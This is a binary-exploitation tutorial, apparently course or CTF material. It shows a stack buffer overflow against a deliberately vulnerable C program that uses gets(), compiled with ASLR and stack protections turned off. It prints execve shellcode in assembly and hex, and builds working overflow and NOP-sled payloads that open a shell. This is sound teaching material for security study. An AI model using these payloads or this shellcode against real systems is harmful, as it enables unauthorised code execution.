You can get all of the files that this tutorial discusses here
In order to work on this exploit, we need to disable ASLR. This is a security feature that we will learn about later. To do this issue the following command in your shell:
$ exec setarch linux32 -R /bin/bash
This will disable ASLR for your current shell. The rest of your OS, however, is still protected, so don't worry.
#include <stdio.h>
void vuln() {
char buf[32];
printf("What's your name? ");
gets(buf);
printf("Hi, %s!\n", buf);
}
int main() {
vuln();
return 0;
}
Can you spot the vulnerability in this function?
The vulnerability is the call to
gets(buf)
. This function will read a
string from standard input and put it in buf. The problem is that it
does not check if buf is actually big enough to hold the result! It just
keeps on writing characters, no matter what actually resides in memory.
We can use this to exploit the program. Our attack will be a classic
example of a buffer overflow exploit.
First, let's compile this file. It's already compiled in the tarball, but if you want to compile yourself the command is:
$ gcc -m32 -z execstack -fno-stack-protector vulnerable.c -o vulnerable
Note: If you compile yourself, the generated assembly may look
slightly different from what is shown in this walkthrough due to
different versions of gcc and system configurations. The
-z execstack -fno-stack-protector
flags are there in order to disable some security features that
would complicate this introduction.
Let's play around with the executable:
$ ./vulnerable
What's your name? Blair
Hi, Blair!
$ ./vulnerable
What's your name? Blair Mason
Hi, Blair Mason!
$ python -c "print 'A'*256" | ./vulnerable
What's your name? Hi, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA!
Segmentation Fault
$
Looks like we got the program to crash! Why? Well, it makes sense if
you take a look. The gets()
function
read in 256 'A's and just blindly wrote them into memory, starting at the
address of buf. This is bound to run into something important and overwrite
it. Let's take a look at what happened by checking the kernel error
logs:
$ dmesg | tail
[442278.585208] vulnerable[30671]: segfault at 41414141 ip 0000000041414141
sp 00000000ffffd860 error 14
$
That error message (look for the one corresponding to your program) tells us that the segfault was triggered by trying to access memory address 0x41414141. What is 0x41 in ASCII? "A"! It also helps us by giving us the value of the instruction pointer (ip) and stack pointer (sp). Look at the value of the instruction pointer: 0x41414141. So the segfault was caused by the program trying to execute code starting at address 0x41414141.
Why did the program try to execute code from 0x41414141? Recall the x86 calling convention. The call instruction pushes the return address onto the stack and then jumps to the function. The ret instruction pops that address off the stack and then jumps to that address. However, what happens if the address is corrupted (overwritten) during the execution of the function? The ret instruction still happily pops the address off the stack and jumps to it! So now, we have a way to get the program to execute arbitrary code.
Now, our goal is to get a little bit more specific information about the program so we can craft our exploit payload. Our goal will be to execute some arbitrary code. This code, we hope, will spawn us a shell. So, we'll call it our shellcode. Don't worry about the actual contents of this code for now - we'll cover that later.
We can get a look at the actual assembly code by using the objdump command:
$ objdump -d -Mintel vulnerable > vulnerable.asm
This gives us a dump of the assembly code. The dump has three columns. The first column is the address of the instruction. The second column is the sequence of bytes that exists in memory at that location. The third column is the assembly instructions that corrospond to that machine code. Take a look at the vuln function (this isn't rocket science; just Ctrl+F or / for those of you awesome enough to be using less or vim):
08048434 <vuln>:
8048434: 55 push ebp
8048435: 89 e5 mov ebp,esp
8048437: 83 ec 38 sub esp,0x38
804843a: b8 50 85 04 08 mov eax,0x8048550
804843f: 89 04 24 mov DWORD PTR [esp],eax
8048442: e8 19 ff ff ff call 8048360 <printf@plt>
8048447: 8d 45 d8 lea eax,[ebp-0x28]
804844a: 89 04 24 mov DWORD PTR [esp],eax
804844d: e8 1e ff ff ff call 8048370 <gets@plt>
8048452: b8 63 85 04 08 mov eax,0x8048563
8048457: 8d 55 d8 lea edx,[ebp-0x28]
804845a: 89 54 24 04 mov DWORD PTR [esp+0x4],edx
804845e: 89 04 24 mov DWORD PTR [esp],eax
8048461: e8 fa fe ff ff call 8048360 <printf@plt>
8048466: c9 leave
8048467: c3 ret
Before we begin analyzing this function, make sure you follow the number one rule of reverse engineering assembly code: always draw out your stack! Make sure you use pencil so you can keep updating memory, or in the best case have a whiteboard available.
This function is pretty unremarkable. We first have our standard function prologue. Then, we subtract 0x38 from esp, which allocates 0x38 (56) bytes of space on the stack.
We then move an address into eax, and place that at the top of the stack. Then we call printf. Note that we don't push the arguments like we would if we were handwriting assembly. A lot of the time, compilers don't manually push/pop arguments but instead allocate a bit of extra space on the stack and just place arguments on the stack where they are supposed to go. So, the first argument to the function is at the top of the stack (i.e., [esp]), the second argument right below that on the stack (and thus right above it in memory, [esp+4]), the third at [esp+8], etc.
So how do we find out what the first argument to printf is? Well, we can figure it out by looking at the C code, but we do not always have that available. In that case, objdump comes to our rescue once again:
$ objdump -s vulnerable > vulnerable.dump
This file looks a lot like if you opened up a hex editor on RAM while running the program. The headers tell you which section you are in. For this case, the address we are looking for resides in the .rodata segment, which is just like the .data segment we used earlier except that the compiler has marked it as read only.
Contents of section .rodata:
8048548 03000000 01000200 57686174 27732079 ........What's y
8048558 6f757220 6e616d65 3f200048 692c2025 our name? .Hi, %
8048568 73210a00
When reading this dump, the first column is the memory address of the first byte displayed on that line. After that is a sequence of hexadecimal digits that show the contents of that memory starting at that address, one dword (4 bytes) per grouping and 16 bytes per line. After that is the ascii representation corrosponding to the contents you just saw in hex, with non-printable characters represented by periods. So, as you can see from the dump, the contents of memory at the address we passed to printf (0x8048550) is the string "What's your name? ".
After calling printf, we load the address ebp-0x28 into eax, and place this address at the top of the stack. We then call gets. So, the buffer we want to overflow starts at address ebp-0x28. We also know from the calling convention that the return address will reside at ebp+4. So, there is a total of 0x28 + 4 = 0x2c = 44 bytes of space between the beginning of our buffer and the address we want to return to. In this case, we'll place our shellcode immediately after the return address in memory, so our payload will be: 44 bytes of junk ("A"*44) + Shellcode Address + Shellcode.
Shellcode is not incredibly complex assembly code. The goal of shellcode is to spawn a shell. The most common way to do this is by calling the execve /bin/bash system call. You can find the calling convention for system calls here.
[BITS 32]
; Note that we MUST have a valid stack for this to work!
xor ecx, ecx ; zero ecx
mul ecx ; edx:eax = eax*ecx, i.e. zeros edx and eax
mov al, 0xb ; set eax to 0xb, syscall number for execve
push ecx ; pushes a zero onto the stack (stack is \0\0\0\0)
push '//sh' ; push '//sh' onto stack (stack is //sh\0\0\0\0)
push '/bin' ; push '/bin' onto stack (stack is /bin//sh\0\0\0\0)
mov ebx, esp ; set ebx (arg1: path) to stack pointer ("/bin//sh")
push ecx ; push another zero (execve needs a NULL at the end)
push ebx ; push addr of "/bin//sh"
mov ecx, esp ; set ecx (arg2: argv) to ["/bin//sh", 0]
; edx (arg3: envp) is already NULL from `mul ecx`
int 0x80 ; perform system call
You should be able to figure out how that works if you look at the calling convention, the man page for execve (2), look at those comments, and draw your stack out. If you have issues, come talk to me.
Now, we want to assemble this code out into a flat binary file:
$ nasm shellcode.asm -o shellcode
We can then use a small script to dump the shellcode as a string. Ths script (getascii):
#!/usr/bin/env python
import sys
if len(sys.argv) != 2:
sys.stderr.write('USAGE: ' + sys.argv[0] + ' FILE\n')
sys.exit(1)
with open(sys.argv[1], "rb") as f:
byte = f.read(1)
mystr = ''
while byte != "":
s = hex(ord(byte[0]))
if len(s) == 3:
mystr += '\\x0' + s[2:]
else:
mystr += '\\x' + s[2:]
byte = f.read(1)
print('"'+mystr+'"')
chmod that script so you can use it, and then we'll run the script. I'm also going to save it into an environment variable to make things clearer in this tutorial, but you can just copy and paste if you want. With more complex payloads, it is actually useful to copy your shellcode into a python script as the payload will be a bit much for a one liner.
$ ./getascii shell
"\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e
\x89\xe3\x51\x53\x89\xe1\xcd\x80"
$ SHELLCODE=`./getascii shell`
Now, we'll write our payload, with a dummy return to 0xdeadbeef to make sure that everything works. Note that the return address is converted into little endian:
$ python -c "print 'A'*44+'\xef\xbe\xad\xde'+$SHELLCODE" | ./vulnerable
What's your name? Hi, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAᆳQh//shh/binS!
Segmentation fault
$ dmesg | tail
[616178.375511] vulnerable[16929]: segfault at deadbeef ip 00000000deadbeef
sp 00000000ffffd860 error 14
Now, we see that the program segfaults accessing deadbeef, and that deadbeef is accessed because the program is trying to execute code at that location. This is good. So now, we want to change that deadbeef to the address of our shellcode. Once we've popped the return address off the stack with the ret instruction, the stack pointer is going to point to whatever is directly above (in terms of the memory address, but beneath on the stack) in memory. Because of where we put our shellcode, this happens to be the shellcode itself! So, we can just fill in the stack pointer that dmesg gives us (NOTE: This will be different on your system!). Let's dump our shellcode into a file:
$ python -c "print -c 'A'*44+'\x60\xd8\xff\xff'+$SHELLCODE" > payload
Now, we execute our attack on this program. We want to first send our payload to the program, and then we need to send standard input over to the program so that we can send commands to the shell. So, the actual attack:
$ cat payload - | ./vulnerable
What's your name? Hi, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAᆳQh//shh/binS!
ls
payload vulnerable vulnerable.asm vulnerable.c vulnerable.dump
whoami
m164122
Note that the shell will not give you any prompts; you just have to try typing commands and see if they work.
Congratulations! You've completed the helloworld of binary exploitation! Rejoice at the sight of your shell! After many long hours of staring at hexadecimal during a CTF it is the most beautiful sight in the world...
In some cases, you cannot precisely compute the address of your shellcode. In other cases, you might be feeling lazy and not want to bother to precisely compute the address you want to jump to. So, we use a technique called a NOP sled. NOP is a machine instruction, opcode 0x90, which essentially tells the machine to continue on to the next instruction. If we string a bunch of these together before our shellcode, then we can just guess an address. If the address we guess points to anywhere in our NOP sled the machine will walk along the sled and gladly continue on to our shellcode.
So, let's redesign our payload using a NOP sled. We can be much lazier when designing a NOP sled payload, as nothing has to line up perfectly - just good enough. Let's bring up the code for vuln again:
void vuln() {
char buf[32];
printf("What's your name? ");
gets(buf);
printf("Hi, %s!\n", buf);
}
We see that our buffer is 32 bytes long, and there are no other variables allocated on the stack. We know that the compiler is going to add in some other stuff/space on the stack, so let's just pick the next highest round number - 64 bytes (remember that round numbers are powers of 2 for us now!). We'll fill this up with copies of the address we want to write. The number of copies we'll need to write is 64 bytes / (4 bytes/copy) = 16 copies of the return address. Then, we'll add in a decent sized NOP Sled - let's say 256 NOPs. Last, our shellcode. Now, let's get a rough estimate for what address we should pick:
$ python -c "print 'A'*256" | ./vulnerable
What's your name? Hi, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA!
Segmentation Fault
$ dmesg | tail
[442278.585208] vulnerable[30671]: segfault at 41414141 ip 0000000041414141
sp 00000000ffffd850 error 14
We know our NOP sled is going to start somewhere around the vicinity of the stack pointer location at the crash. Our NOP sled is 256 = 0x100 bytes long, so we'll take half that (0x80) and add that to the stack pointer value at the crash to get 0xffffd8d0. That should be about midway through our NOP sled and thus give us the best chance of hitting. So, the moment of truth:
$ python -c "print '\xd0\xd8\xff\xff'+'\x90'*256+$SHELLCODE" > payload
$ cat payload - | ./vulnerable
What's your name? Hi, ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ1Qh//shh/binS!
ls
getascii payload shell shell.asm vulnerable vulnerable.c
How much easier was that? Draw out what memory should look like and convince yourself as to why it works. You need to have a solid understanding of how the first exploit (that we precisely calculated) works in order to really get why we can be lazy using this NOP sled. If you want to get an exploit quickly, the NOP sled is an important tool to decrease the amount of work you have to do. It also enables certain more advanced techniques that would be otherwise impossible. Once you get how these exploits work (by doing the first one a few times) you will appreciate the simplicity of not having to be exact about memory.
This is a basic walkthrough on how to craft an exploit. However, we turned off a lot of common mitigation techniques that are in use on modern machines. We will go over some of these later, but the important information to gain from this is the basic walkthrough on the actual process of analysis, reverse engineering, payload crafting, and attack. In an actual competition later levels will take some of this information away from you. They will place the program you need to exploit on a remote computer, so you no longer have nice diagnostics like dmesg to tell you how the program is failing. They will not give you C source code. They will turn on some (usually not all) of the mitigations that we turned off. BUT, the basic techniques and the workflow for exploiting the program is the same - the only thing that changes is some of the details on how to craft the payload.